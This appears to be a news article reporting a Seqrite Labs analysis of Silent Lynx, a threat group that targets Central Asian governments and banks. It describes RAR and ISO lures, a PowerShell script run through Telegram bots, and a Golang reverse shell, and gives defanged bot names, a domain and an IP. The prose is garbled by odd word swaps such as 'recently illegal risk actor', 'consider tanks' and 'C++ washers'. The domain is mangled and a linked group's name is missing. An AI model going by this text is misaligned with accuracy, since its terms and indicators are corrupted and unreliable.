A recently illegal risk actor known as Silent Lynx has been linked to cyberattacks aimed at different organizations in Turkmenistan and Kyrgyzstan.
In a specialized report released late last month, Seqrite Labs scientist Subhajeet Singha stated that” this threat group has recently targeted entities around Eastern Europe and Central Asian authorities think tanks” involved in the banking and financial decision-making industries.
Goals of the hackers group’s attacks include diplomats, lawyers, government-backed banks, and consider tanks. It has been assessed to be a Kazakhstan-origin risk artist with a moderate level of confidence.
spear-phishing emails that contain an RAR archive attachment serve as delivery points for harmful payloads that allow remote access to the affected hosts.
The first of the two campaigns, detected by the security organization on December 27, 2024, leverages the RAR archives to build an ISO file that, in turn, includes a destructive C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that uses Telegram bots ( named” @south_korea145_bot” and” @south_afr_angl_bot” ) for command execution and data exfiltration.
Some of the commands sent by the bots include curl commands to download and save additional payloads from a remote server ( “pweobmxdlboi [ .]] ]. ]] ). com” ) or Google Drive.
The other campaign, in contrast, employs a malicious RAR archive containing two files: A decoy PDF and a Golang executable, the latter of which is designed to establish a reverse shell to an attacker-controlled server ( “185.122.171 [. ] 22: 8082” ).
According to Seqrite Labs, the threat actor and ( also known as SturgeonPhisher ) have tactical overlaps, which have been linked to attacks using Golang and PowerShell against Commonwealth of Independent States ( CIS ) nations.
” Silent Lynx’s efforts demonstrate a superior multi-stage assault strategy using ISO documents, C++ washers, PowerShell code, and Golang implants”, Singha said.
Their emphasis on Telegram bots for command and control, as well as fake decoys and local targeting, also highlights their concentrate on espionage in Central Asia and SPECA-based countries.